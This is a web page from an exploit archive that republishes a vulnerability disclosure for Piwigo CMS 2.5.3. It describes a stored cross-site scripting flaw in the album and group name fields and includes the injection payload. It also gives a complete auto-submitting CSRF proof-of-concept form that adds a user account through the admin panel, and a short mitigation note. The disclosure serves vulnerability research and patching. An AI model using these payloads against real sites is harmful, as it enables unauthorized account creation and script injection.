Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Piwigo 2.5.3 CMS:Multiple vulnerability's - exploit.company
header-logo
Suggest Exploit
vendor:
Piwigo CMS
by:
sajith
5.5
CVSS
MEDIUM
Stored XSS, CSRF
79, 352
CWE
Product Name: Piwigo CMS
Affected Version From: Piwigo 2.5.3
Affected Version To: Piwigo 2.5.3
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Piwigo 2.5.3 CMS:Multiple vulnerability’s

The Piwigo CMS version 2.5.3 is vulnerable to Stored XSS on multiple parameters and CSRF vulnerability. In the first vulnerability, an attacker can inject malicious payload in the album name and execute arbitrary code. The payload can also be executed when managing albums. In the second vulnerability, an attacker can exploit the 'add a user' functionality using CSRF vulnerability.

Mitigation:

Apply the latest patch or upgrade to a newer version of the CMS. Avoid using untrusted inputs in the album name or other parameters.
Source

Exploit-DB raw data:

###########################################################
[~] Exploit Title: Piwigo 2.5.3 CMS:Multiple vulnerability's
[~] Author: sajith
[~] version: Piwigo 2.5.3
[~]Vendor Homepage: http://piwigo.org
[~] vulnerable app link:http://www.piwigo.org/basics/downloads
###########################################################


[1] Stored XSS on Multiple parameters

    <1> click on Add photos (
http://127.0.0.1/cms/piwigo/admin.php?page=photos_add) and click on "create
new album" in the album name enter the payload "><img src=x
onerror=prompt(1);> and save it we can see that our payload gets
executed.we can also see that when you click on "albums" and "manage"
functionality payload gets executed.


    <2>click on users > groups > in the "group name" field add above xss
payload and click on save.


[2] CSRF vulnerability


    click on >users >manage  where "add a user " functionality can be
exploited using CSRF vulnerability(poc shown below)


<head>
<title>POC by sajith shetty</title>
</head>
<body>
<form action="http://127.0.0.1/cms/piwigo/admin.php?page=user_list"
id="formid" method="post">
<input type="hidden" name="login" value="crsfpoc123" />
<input type="hidden" name="password" value="Password123@" />
<input type="hidden" name="email" value="xyz@aaww.com" />
<input type="hidden" name="send_password_by_mail" value="1" />
<input type="hidden" name="submit_add" value="Submit" />
</form>
<script>
document.getElementById('formid').submit();
</script>
</body>
</html>

Navigation

Suggest Exploit

Services By CQR